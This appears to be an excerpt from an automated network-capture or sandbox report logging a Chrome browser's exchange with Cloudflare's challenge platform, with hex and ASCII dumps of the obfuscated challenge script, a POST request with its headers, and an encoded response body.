                                                            Data Ascii: 0properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%2
                                                            2025-01-07 20:28:57 UTC1369INData Raw: 67 68 2c 67 73 2c 67 77 2c 67 78 2c 67 79 2c 67 43 2c 67 44 2c 67 48 2c 65 59 2c 65 5a 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 33 37 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 31 34 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 36 31 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 39 35 32 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 32 36 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 36 32 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 36 36 29 29 2f 37 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28
                                                            Data Ascii: gh,gs,gw,gx,gy,gC,gD,gH,eY,eZ){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1037))/1+-parseInt(gI(1214))/2+-parseInt(gI(1261))/3+parseInt(gI(952))/4+-parseInt(gI(1426))/5+parseInt(gI(1062))/6*(-parseInt(gI(966))/7)+-parseInt(gI(
                                                            2025-01-07 20:28:57 UTC1369INData Raw: 4d 5b 68 4a 28 31 30 34 34 29 5d 5b 68 4a 28 32 37 33 29 5d 28 29 2c 65 4d 5b 68 4a 28 32 36 39 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 65 5b 68 4a 28 31 34 32 31 29 5d 5d 5b 68 4a 28 31 33 36 31 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 65 5b 68 4a 28 38 36 34 29 5d 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 68 4a 28 36 35 38 29 5d 5b 68 4a 28 39 34 32 29 5d 2c 27 65 76 65 6e 74 27 3a 68 4a 28 35 38 36 29 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 68 4a 28 36 35 38 29 5d 5b 68 4a 28 38 36 31 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 68 4a 28 36 35 38 29 5d 5b 68 4a 28 39 33 37 29 5d 2c 27 63 6f 64 65 27 3a 65 5b 68 4a 28 31 36 36 37 29 5d 2c 27 72 63 56 27 3a 65 4d 5b 68 4a 28 36 35 38 29 5d 5b 68 4a 28 35 34 35 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67
                                                            Data Ascii: M[hJ(1044)][hJ(273)](),eM[hJ(269)]=!![],eM[e[hJ(1421)]][hJ(1361)]({'source':e[hJ(864)],'widgetId':eM[hJ(658)][hJ(942)],'event':hJ(586),'cfChlOut':eM[hJ(658)][hJ(861)],'cfChlOutS':eM[hJ(658)][hJ(937)],'code':e[hJ(1667)],'rcV':eM[hJ(658)][hJ(545)]},'*'))},g
                                                            2025-01-07 20:28:57 UTC1369INData Raw: 6b 5b 68 4b 28 33 34 39 29 5d 28 6b 5b 68 4b 28 38 31 30 29 5d 28 6b 5b 68 4b 28 31 30 34 33 29 5d 28 6b 5b 68 4b 28 31 33 39 36 29 5d 28 68 4b 28 37 37 37 29 2b 6e 2c 68 4b 28 31 34 32 38 29 29 2b 31 2c 68 4b 28 31 33 35 31 29 29 2b 65 4d 5b 68 4b 28 36 35 38 29 5d 5b 68 4b 28 36 38 33 29 5d 2c 27 2f 27 29 2b 65 4d 5b 68 4b 28 36 35 38 29 5d 2e 63 48 2c 27 2f 27 29 2b 65 4d 5b 68 4b 28 36 35 38 29 5d 5b 68 4b 28 34 34 30 29 5d 2c 73 3d 7b 7d 2c 73 5b 68 4b 28 31 30 38 33 29 5d 3d 65 4d 5b 68 4b 28 36 35 38 29 5d 5b 68 4b 28 31 30 38 33 29 5d 2c 73 5b 68 4b 28 31 31 34 38 29 5d 3d 65 4d 5b 68 4b 28 36 35 38 29 5d 5b 68 4b 28 31 31 34 38 29 5d 2c 73 5b 68 4b 28 35 30 38 29 5d 3d 65 4d 5b 68 4b 28 36 35 38 29 5d 5b 68 4b 28 35 30 38 29 5d 2c 73 5b 68 4b 28
                                                            Data Ascii: k[hK(349)](k[hK(810)](k[hK(1043)](k[hK(1396)](hK(777)+n,hK(1428))+1,hK(1351))+eM[hK(658)][hK(683)],'/')+eM[hK(658)].cH,'/')+eM[hK(658)][hK(440)],s={},s[hK(1083)]=eM[hK(658)][hK(1083)],s[hK(1148)]=eM[hK(658)][hK(1148)],s[hK(508)]=eM[hK(658)][hK(508)],s[hK(
                                                            2025-01-07 20:28:57 UTC1369INData Raw: 28 31 30 39 35 29 5d 28 6b 29 2c 6c 26 26 28 68 4c 28 34 38 38 29 3d 3d 3d 68 4c 28 31 32 30 30 29 3f 28 65 28 68 4c 28 37 36 30 29 2c 66 75 6e 63 74 69 6f 6e 28 73 2c 68 4d 29 7b 68 4d 3d 68 4c 2c 73 5b 68 4d 28 32 33 38 29 5d 5b 68 4d 28 32 33 34 29 5d 28 68 4d 28 36 36 36 29 29 7d 29 2c 66 28 68 4c 28 31 30 37 38 29 2c 68 4c 28 37 33 31 29 29 29 3a 28 67 3d 6c 5b 31 5d 2c 68 3d 70 61 72 73 65 49 6e 74 28 6c 5b 32 5d 2c 31 30 29 2c 69 3d 65 5b 68 4c 28 37 39 36 29 5d 28 70 61 72 73 65 49 6e 74 2c 6c 5b 33 5d 2c 31 30 29 29 29 7d 7d 65 6c 73 65 20 66 3d 4a 53 4f 4e 5b 68 4c 28 31 33 36 35 29 5d 28 64 29 3b 72 65 74 75 72 6e 20 6d 3d 7b 7d 2c 6d 5b 68 4c 28 37 31 37 29 5d 3d 66 2c 6d 5b 68 4c 28 38 31 37 29 5d 3d 67 2c 6d 5b 68 4c 28 35 39 37 29 5d 3d 68
                                                            Data Ascii: (1095)](k),l&&(hL(488)===hL(1200)?(e(hL(760),function(s,hM){hM=hL,s[hM(238)][hM(234)](hM(666))}),f(hL(1078),hL(731))):(g=l[1],h=parseInt(l[2],10),i=e[hL(796)](parseInt,l[3],10)))}}else f=JSON[hL(1365)](d);return m={},m[hL(717)]=f,m[hL(817)]=g,m[hL(597)]=h
                                                            2025-01-07 20:28:57 UTC1369INData Raw: 68 4f 28 31 32 33 35 29 5d 2c 65 29 3b 72 65 74 75 72 6e 21 5b 5d 7d 2c 66 75 3d 30 2c 66 78 3d 7b 7d 2c 66 78 5b 67 4a 28 33 33 30 29 5d 3d 66 77 2c 65 4d 5b 67 4a 28 31 33 38 38 29 5d 3d 66 78 2c 66 7a 3d 65 4d 5b 67 4a 28 36 35 38 29 5d 5b 67 4a 28 31 36 32 37 29 5d 5b 67 4a 28 31 32 37 34 29 5d 2c 66 41 3d 65 4d 5b 67 4a 28 36 35 38 29 5d 5b 67 4a 28 31 36 32 37 29 5d 5b 67 4a 28 35 37 31 29 5d 2c 66 42 3d 65 4d 5b 67 4a 28 36 35 38 29 5d 5b 67 4a 28 31 36 32 37 29 5d 5b 67 4a 28 33 39 34 29 5d 2c 66 4e 3d 21 5b 5d 2c 66 5a 3d 75 6e 64 65 66 69 6e 65 64 2c 65 4d 5b 67 4a 28 39 30 36 29 5d 28 67 4a 28 31 33 37 30 29 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 69 4d 2c 65 2c 66 2c 67 29 7b 69 4d 3d 67 4a 2c 65 3d 7b 7d 2c 65 5b 69 4d 28 32 38 35 29 5d 3d 69 4d
                                                            Data Ascii: hO(1235)],e);return![]},fu=0,fx={},fx[gJ(330)]=fw,eM[gJ(1388)]=fx,fz=eM[gJ(658)][gJ(1627)][gJ(1274)],fA=eM[gJ(658)][gJ(1627)][gJ(571)],fB=eM[gJ(658)][gJ(1627)][gJ(394)],fN=![],fZ=undefined,eM[gJ(906)](gJ(1370),function(d,iM,e,f,g){iM=gJ,e={},e[iM(285)]=iM
                                                            2025-01-07 20:28:57 UTC1369INData Raw: 72 65 74 75 72 6e 20 48 3d 3d 3d 47 7d 2c 27 4f 63 51 6b 58 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 61 4a 6e 46 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 66 6e 62 57 48 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3c 48 7d 2c 27 73 52 54 56 49 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c 27 48 50 42 43 55 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3d 3d 3d 48 7d 2c 27 42 7a 47 52 47 27 3a 6a 6f 28 33 38 39 29 2c 27 4d 43 6e 65 47 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 4d 50 78 49 69 27 3a 66 75 6e 63 74 69 6f 6e 28 47
                                                            Data Ascii: return H===G},'OcQkX':function(G,H){return G+H},'aJnFZ':function(G,H){return G+H},'fnbWH':function(G,H){return G<H},'sRTVI':function(G,H){return G(H)},'HPBCU':function(G,H){return G===H},'BzGRG':jo(389),'MCneG':function(G,H){return G+H},'MPxIi':function(G
                                                            2025-01-07 20:28:57 UTC1369INData Raw: 69 5b 6c 5b 6d 5d 5d 5b 6a 72 28 31 32 37 33 29 5d 28 66 75 6e 63 74 69 6f 6e 28 73 29 7b 72 65 74 75 72 6e 27 6f 2e 27 2b 73 7d 29 7d 2c 65 4d 5b 67 4a 28 31 32 39 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 67 47 28 63 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 67 45 28 67 46 28 63 29 29 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 6a 44 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 6a 44 3d 67 4a 2c 64 3d 7b 27 59 62 74 46 42 27 3a 6a 44 28 31 33 30 34 29 2c 27 41 52 50 67 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 6c 71 49 59 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 5e 69 7d 2c 27 69 71 58 55 70 27 3a 66 75 6e 63 74 69 6f 6e
                                                            Data Ascii: i[l[m]][jr(1273)](function(s){return'o.'+s})},eM[gJ(1298)]=function(c){try{return gG(c)}catch(e){return gE(gF(c))}},function(jD,d,e,f,g){return jD=gJ,d={'YbtFB':jD(1304),'ARPgD':function(h,i){return i==h},'lqIYz':function(h,i){return h^i},'iqXUp':function
                                                            2025-01-07 20:28:57 UTC1369INData Raw: 69 7d 2c 27 41 76 6a 62 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 42 52 78 48 58 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 55 68 6a 50 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 27 43 4f 69 59 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 57 52 42 47 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 58 75 76 50 49 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 49 4e 77 62 57 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 44 41 51 78 4b 27 3a 66
                                                            Data Ascii: i},'Avjbd':function(h,i){return h+i},'BRxHX':function(h,i){return i!=h},'UhjPq':function(h,i){return h===i},'COiYp':function(h,i){return h<i},'WRBGF':function(h,i){return h(i)},'XuvPI':function(h,i){return h<i},'INwbW':function(h,i){return h(i)},'DAQxK':f


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.1649721104.18.95.414436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:28:57 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1660689700:1736278100:0ZQQSFYZPedfX4O_ZYTMwMWkRQdIEiHqnm_WVkeJqJc/8fe6b271e95a19cb/b1kyRIitPK7rAruZNHAEw1s0NrT3tJg6Z9P4eP.Z10E-1736281735-1.1.1.1-P2cVOniWS7c.B83YFhJ3BYHkTauv6gJpPKSU9cTM8LlbLUtTtzE5a_PbshBTYIpL HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 3173
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            Content-type: application/x-www-form-urlencoded
                                                            CF-Chl-RetryAttempt: 0
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            CF-Challenge: b1kyRIitPK7rAruZNHAEw1s0NrT3tJg6Z9P4eP.Z10E-1736281735-1.1.1.1-P2cVOniWS7c.B83YFhJ3BYHkTauv6gJpPKSU9cTM8LlbLUtTtzE5a_PbshBTYIpL
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://challenges.cloudflare.com
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/7vyul/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:28:57 UTC3173OUTData Raw: 76 5f 38 66 65 36 62 32 37 31 65 39 35 61 31 39 63 62 3d 77 4e 78 53 6f 53 59 53 33 53 49 53 35 4a 6e 65 4a 6e 45 53 4a 56 42 39 36 75 4a 4d 6e 36 41 64 6e 73 45 6e 6b 76 50 6b 65 46 36 6e 42 56 36 39 7a 50 46 59 6e 45 6e 78 56 4a 57 6b 2d 6e 4b 50 6e 39 7a 66 57 53 4d 7a 6e 4c 53 4a 7a 57 4a 38 72 24 6b 57 6e 67 53 72 72 74 6e 32 50 6e 33 32 6e 78 59 52 6e 70 6e 46 55 59 6e 46 56 4a 6a 4e 53 46 52 52 7a 52 30 25 32 62 73 6a 43 6e 62 76 76 6b 33 73 48 76 76 4a 52 52 50 56 74 32 52 4c 57 24 56 6e 61 6e 6e 4e 30 71 42 75 59 72 72 41 35 57 47 46 53 45 68 7a 73 5a 50 24 4f 50 24 38 69 6e 6b 41 56 38 41 42 6e 53 42 57 6e 57 59 57 4a 53 6b 7a 78 6e 6b 4b 6e 42 65 51 57 46 53 6e 46 6e 4a 47 46 6e 72 4b 39 6e 42 33 6e 55 56 51 47 70 75 41 74 58 6c 44 69 6e 4a 63
                                                            Data Ascii: v_8fe6b271e95a19cb=wNxSoSYS3SIS5JneJnESJVB96uJMn6AdnsEnkvPkeF6nBV69zPFYnEnxVJWk-nKPn9zfWSMznLSJzWJ8r$kWngSrrtn2Pn32nxYRnpnFUYnFVJjNSFRRzR0%2bsjCnbvvk3sHvvJRRPVt2RLW$VnannN0qBuYrrA5WGFSEhzsZP$OP$8inkAV8ABnSBWnWYWJSkzxnkKnBeQWFSnFnJGFnrK9nB3nUVQGpuAtXlDinJc
                                                            2025-01-07 20:28:57 UTC775INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 20:28:57 GMT
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Content-Length: 163212
                                                            Connection: close
                                                            cf-chl-gen: lhx9jAGK/fXz66v5wY+3+ZKjtIUQCzXJxg4mNqGgJ0tDpc85UeJcZ1gNy0FVcDtsp784RZmfG+39bn9lRpWdi4HM6peEQomIm5mWf7D6Na+FSw+1zf5E4z5sFOAzQA5yyt7aX3Mvm+JNnVwQOqd1hPKjVX5h91Eg8jU29UheAAYDKc7oO47Grqw7eRG/t+Fy5kanVMxO/uoYjGOFMuk+U9d12PFJVph7ZdS2nQuUdG527noJy2N5UVf1jx7KCsdplSS3owJhZYFTF5Oorl5NOS7Hp7Lduy9amSErqFfqUeyh3W9Za6DKHZOr/Lr2BE+psveG7ftUdiEs8Tzgm4YWxkVnbJzM9z1g+q7tNRKTNriCqvNfsRwArGKkGi98+aD0qwowjtXXZ9ssZHCBVAzorL3twP6MQOoB1Plw4Kl61EJwnCpqymzPjW8baxJHxdhh7dh5zRqH3AjNiUEdKJ3ceM1yhMvVSe+OnvAFy79280DHNYoBam2LfIWK23plcBLRv2BAj24svd40$6zXge+2Nd6cMqWdS
                                                            Server: cloudflare
                                                            CF-RAY: 8fe6b27c08934345-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 20:28:57 UTC594INData Raw: 59 34 56 74 65 57 74 53 6a 57 79 58 67 32 6d 4d 68 6e 64 62 56 46 68 30 69 58 36 69 59 33 2b 50 68 48 65 46 6b 34 53 41 64 34 43 76 67 34 36 49 6b 6e 46 72 71 47 79 74 69 71 75 6e 64 6f 6d 32 64 70 69 35 6c 6f 4b 78 77 4a 69 78 67 70 6e 46 69 61 69 5a 7a 73 43 59 78 59 6d 62 72 4a 79 7a 72 70 44 57 6d 64 4b 72 79 72 32 72 7a 74 71 39 73 4f 4b 38 76 72 53 78 78 74 61 67 31 2b 47 38 77 4f 50 52 34 73 54 6e 31 65 54 56 30 65 2f 68 32 4e 6a 62 36 64 66 6e 30 73 72 4d 7a 4e 7a 55 7a 74 2f 37 32 77 44 6e 39 41 50 37 36 66 37 37 34 65 77 44 41 4f 51 59 36 74 55 61 47 50 4d 4f 2b 65 7a 2b 2b 42 63 44 38 75 51 6b 4a 68 34 49 42 2f 62 70 4a 41 63 6b 45 41 4d 77 4c 67 51 43 4e 66 58 32 47 44 63 31 4f 66 55 57 48 69 76 33 41 50 6b 55 49 52 41 59 4b 55 4e 43 4a 2f 34
                                                            Data Ascii: Y4VteWtSjWyXg2mMhndbVFh0iX6iY3+PhHeFk4SAd4Cvg46IknFrqGytiqundom2dpi5loKxwJixgpnFiaiZzsCYxYmbrJyzrpDWmdKryr2rztq9sOK8vrSxxtag1+G8wOPR4sTn1eTV0e/h2Njb6dfn0srMzNzUzt/72wDn9AP76f774ewDAOQY6tUaGPMO+ez++BcD8uQkJh4IB/bpJAckEAMwLgQCNfX2GDc1OfUWHiv3APkUIRAYKUNCJ/4
                                                            2025-01-07 20:28:57 UTC1369INData Raw: 77 6c 50 53 63 76 50 69 4a 4a 4c 46 41 68 44 6a 45 31 58 42 49 57 46 46 77 77 4e 6b 78 6a 52 54 42 47 4d 6c 52 52 59 31 78 66 62 55 64 4b 58 6b 49 6f 4b 54 34 39 52 58 4e 48 64 31 45 36 4d 6c 64 4e 65 57 2b 42 59 31 70 69 57 6d 64 6a 56 47 4a 55 58 30 56 34 56 6b 47 42 61 30 31 6a 63 70 56 6a 5a 6d 39 50 65 35 57 48 68 6d 79 57 6e 46 35 62 6d 4a 4f 41 59 48 32 70 59 48 32 64 70 4a 61 61 6a 4a 78 73 69 47 39 73 66 71 68 77 74 72 4f 4f 6d 4a 32 62 73 34 70 39 71 36 7a 45 74 4c 64 39 74 4c 50 41 70 70 75 4b 79 4a 36 4a 6d 4c 2f 54 70 61 69 7a 6c 4c 54 4a 77 35 58 49 71 38 36 36 30 4b 69 39 31 74 54 52 31 63 4c 47 75 4c 4f 36 71 71 53 70 35 63 37 49 77 36 7a 4c 70 76 53 31 37 2b 72 58 39 2b 6e 38 75 39 44 6e 37 75 6e 32 41 76 6a 41 34 64 6e 79 36 76 66 54 39
                                                            Data Ascii: wlPScvPiJJLFAhDjE1XBIWFFwwNkxjRTBGMlRRY1xfbUdKXkIoKT49RXNHd1E6MldNeW+BY1piWmdjVGJUX0V4VkGBa01jcpVjZm9Pe5WHhmyWnF5bmJOAYH2pYH2dpJaajJxsiG9sfqhwtrOOmJ2bs4p9q6zEtLd9tLPAppuKyJ6JmL/TpaizlLTJw5XIq8660Ki91tTR1cLGuLO6qqSp5c7Iw6zLpvS17+rX9+n8u9Dn7un2AvjA4dny6vfT9
                                                            2025-01-07 20:28:57 UTC1369INData Raw: 4c 55 42 55 52 49 6c 6b 6f 46 42 77 6e 53 52 35 4b 47 56 42 64 59 57 41 35 52 47 63 37 52 32 67 35 50 45 78 4f 58 6a 6b 77 54 55 70 78 62 56 42 4e 51 30 4a 4f 50 44 56 31 53 47 41 33 54 57 78 38 51 48 79 47 5a 33 64 55 68 45 5a 71 68 58 39 4d 66 6c 31 38 6a 59 35 66 6c 6d 4b 53 61 48 46 53 6b 56 79 48 57 70 74 66 62 4a 47 68 59 70 57 48 6d 32 68 68 59 71 46 73 6a 47 71 72 62 72 53 68 73 58 4b 52 6c 36 74 34 64 33 4b 78 66 4a 39 36 75 33 35 39 6f 70 69 65 67 35 6a 47 79 34 57 4a 6d 34 32 2b 72 4d 76 4f 6f 6f 61 69 72 4a 47 57 70 39 61 30 7a 37 36 35 31 64 76 59 73 36 44 50 76 75 61 64 6f 2b 72 68 31 62 2b 37 32 2b 37 72 71 75 37 48 7a 38 44 45 74 75 33 49 35 65 58 31 30 4d 7a 34 77 4f 76 37 39 73 33 31 30 4f 4c 38 32 67 51 49 44 66 33 6c 43 77 48 4b 2f 51
                                                            Data Ascii: LUBURIlkoFBwnSR5KGVBdYWA5RGc7R2g5PExOXjkwTUpxbVBNQ0JOPDV1SGA3TWx8QHyGZ3dUhEZqhX9Mfl18jY5flmKSaHFSkVyHWptfbJGhYpWHm2hhYqFsjGqrbrShsXKRl6t4d3KxfJ96u359opieg5jGy4WJm42+rMvOooairJGWp9a0z7651dvYs6DPvuado+rh1b+72+7rqu7Hz8DEtu3I5eX10Mz4wOv79s310OL82gQIDf3lCwHK/Q
                                                            2025-01-07 20:28:57 UTC1369INData Raw: 4a 6a 63 76 46 44 6c 4e 54 78 77 66 51 7a 51 59 57 6d 46 6d 49 55 41 2f 4f 53 34 33 50 32 30 70 58 47 6c 44 55 57 67 32 61 6a 4a 54 56 32 35 56 58 7a 38 35 57 31 52 43 59 31 4e 79 64 48 56 7a 67 6e 31 32 69 6b 39 75 61 59 42 6b 6a 58 5a 2b 67 70 52 35 6d 32 78 35 55 32 36 49 62 58 4f 62 67 35 74 76 6c 32 52 30 61 58 74 31 6e 57 69 68 66 6d 78 6a 73 34 79 75 67 48 61 58 6d 4a 52 79 6c 59 39 30 64 70 71 61 71 33 2b 61 66 73 53 77 68 4a 54 47 76 71 57 55 75 38 4b 73 75 38 75 6e 30 4c 48 55 31 73 37 4f 7a 4d 58 53 79 39 76 66 6d 37 6e 4c 31 73 37 4f 31 73 48 59 6f 64 4f 79 73 2b 48 70 71 4e 2f 74 34 76 44 30 33 4e 4f 2b 79 63 72 6e 31 38 61 79 39 67 44 67 37 75 48 72 7a 64 4c 32 39 2b 54 31 32 73 62 4c 31 2b 58 4d 33 42 44 6e 44 78 44 31 37 76 58 31 45 52 49
                                                            Data Ascii: JjcvFDlNTxwfQzQYWmFmIUA/OS43P20pXGlDUWg2ajJTV25VXz85W1RCY1NydHVzgn12ik9uaYBkjXZ+gpR5m2x5U26IbXObg5tvl2R0aXt1nWihfmxjs4yugHaXmJRylY90dpqaq3+afsSwhJTGvqWUu8Ksu8un0LHU1s7OzMXSy9vfm7nL1s7O1sHYodOys+HpqN/t4vD03NO+ycrn18ay9gDg7uHrzdL29+T12sbL1+XM3BDnDxD17vX1ERI
                                                            2025-01-07 20:28:57 UTC1369INData Raw: 6b 4d 39 4a 47 46 41 58 56 42 47 4f 7a 39 6e 4f 56 35 4b 62 55 70 45 62 79 70 67 53 48 5a 4d 56 6c 4e 50 57 54 56 62 63 7a 6c 37 63 46 4a 56 59 30 59 35 5a 6d 52 64 66 30 52 6a 62 57 42 4d 55 49 75 47 6c 4a 46 31 68 56 57 45 64 4a 4e 54 56 6c 79 4a 64 46 70 71 59 35 31 69 5a 48 6d 53 69 6f 6c 7a 6c 47 6d 69 62 4a 43 4d 66 6f 75 4b 62 4c 65 76 6c 4a 52 77 67 35 71 53 71 33 79 32 6e 38 47 37 75 38 4f 66 70 6e 71 54 76 61 47 30 69 62 79 76 6a 72 36 78 7a 35 4b 73 69 4b 4c 54 73 4c 72 48 79 64 6e 49 71 62 4c 41 77 4c 4c 50 33 4c 65 65 31 73 6a 53 74 4e 66 68 36 65 2f 66 72 73 44 44 72 74 47 73 77 72 53 33 77 72 6a 53 75 2b 7a 75 36 4e 48 72 32 4d 50 7a 2b 50 4c 65 30 75 45 4c 37 41 73 42 42 2b 72 6e 36 4d 6f 48 45 67 76 52 37 75 7a 69 47 52 4d 50 45 68 49 42
                                                            Data Ascii: kM9JGFAXVBGOz9nOV5KbUpEbypgSHZMVlNPWTVbczl7cFJVY0Y5ZmRdf0RjbWBMUIuGlJF1hVWEdJNTVlyJdFpqY51iZHmSiolzlGmibJCMfouKbLevlJRwg5qSq3y2n8G7u8OfpnqTvaG0ibyvjr6xz5KsiKLTsLrHydnIqbLAwLLP3Lee1sjStNfh6e/frsDDrtGswrS3wrjSu+zu6NHr2MPz+PLe0uEL7AsBB+rn6MoHEgvR7uziGRMPEhIB
                                                            2025-01-07 20:28:57 UTC1369INData Raw: 5a 4b 61 7a 6b 70 4e 57 31 6e 4d 47 4d 78 56 45 45 78 64 79 6c 49 4c 32 35 4b 52 55 39 4d 63 58 74 62 62 32 46 66 58 47 4a 34 55 34 68 2b 52 34 31 59 66 45 56 71 58 6d 35 70 66 35 52 31 6c 57 61 50 6d 5a 5a 78 58 56 42 32 6e 33 61 64 57 34 2b 63 63 58 5a 6d 63 70 78 72 70 61 68 2f 5a 5a 75 42 63 49 43 7a 73 4a 64 78 68 34 2b 31 6b 4b 6d 30 68 70 5a 36 65 6f 74 37 72 37 32 63 75 72 47 52 69 70 65 63 68 71 61 39 6f 35 79 63 6e 34 75 56 72 36 2b 4f 78 36 53 33 32 38 65 32 70 38 43 5a 71 74 57 38 77 4c 37 6c 74 62 4f 30 6f 74 79 71 78 39 32 35 37 64 72 47 78 62 48 4d 31 4b 2f 72 2b 64 6e 52 36 63 2f 4b 2b 76 72 75 77 4d 51 42 37 67 50 69 2f 4e 2f 66 36 65 76 66 35 63 6f 4c 43 4f 7a 6a 43 2b 6e 71 47 67 34 52 34 77 58 34 43 64 33 61 31 39 6b 4f 44 77 59 50 2b
                                                            Data Ascii: ZKazkpNW1nMGMxVEExdylIL25KRU9McXtbb2FfXGJ4U4h+R41YfEVqXm5pf5R1lWaPmZZxXVB2n3adW4+ccXZmcpxrpah/ZZuBcICzsJdxh4+1kKm0hpZ6eot7r72curGRipechqa9o5ycn4uVr6+Ox6S328e2p8CZqtW8wL7ltbO0otyqx9257drGxbHM1K/r+dnR6c/K+vruwMQB7gPi/N/f6evf5coLCOzjC+nqGg4R4wX4Cd3a19kODwYP+
                                                            2025-01-07 20:28:57 UTC1369INData Raw: 43 50 69 68 4f 52 6d 52 67 4e 45 5a 32 62 6a 5a 6e 56 44 74 2f 5a 33 78 54 4e 46 53 46 50 47 4e 6f 59 45 64 6e 53 31 36 4d 61 59 70 34 66 6e 79 4f 61 6c 46 75 61 34 65 51 62 47 74 63 6a 49 74 6f 63 48 6c 37 59 5a 6d 45 6b 61 56 36 6b 33 32 57 6c 71 31 35 71 35 71 5a 70 4b 65 73 63 71 56 76 6f 72 6d 69 69 4b 75 35 73 5a 57 74 75 37 75 5a 65 72 69 54 6e 62 58 45 6c 61 47 43 76 34 37 45 75 72 6d 4e 6a 71 36 6e 74 72 4b 33 6c 73 4c 4d 7a 64 43 76 33 39 4c 4e 6f 4a 32 6a 76 4e 69 31 70 64 37 67 33 71 4c 56 35 65 4f 6f 73 63 58 67 7a 74 33 70 74 4c 6a 6f 31 74 72 4d 78 76 6a 76 38 74 33 67 7a 2f 62 78 43 4e 48 61 30 65 54 37 41 41 55 4c 2b 67 44 4e 44 77 59 4d 39 41 63 42 44 2f 6f 54 39 2b 76 59 2b 41 38 69 44 76 45 56 32 69 55 6e 4b 41 59 72 46 68 6f 75 4a 2f
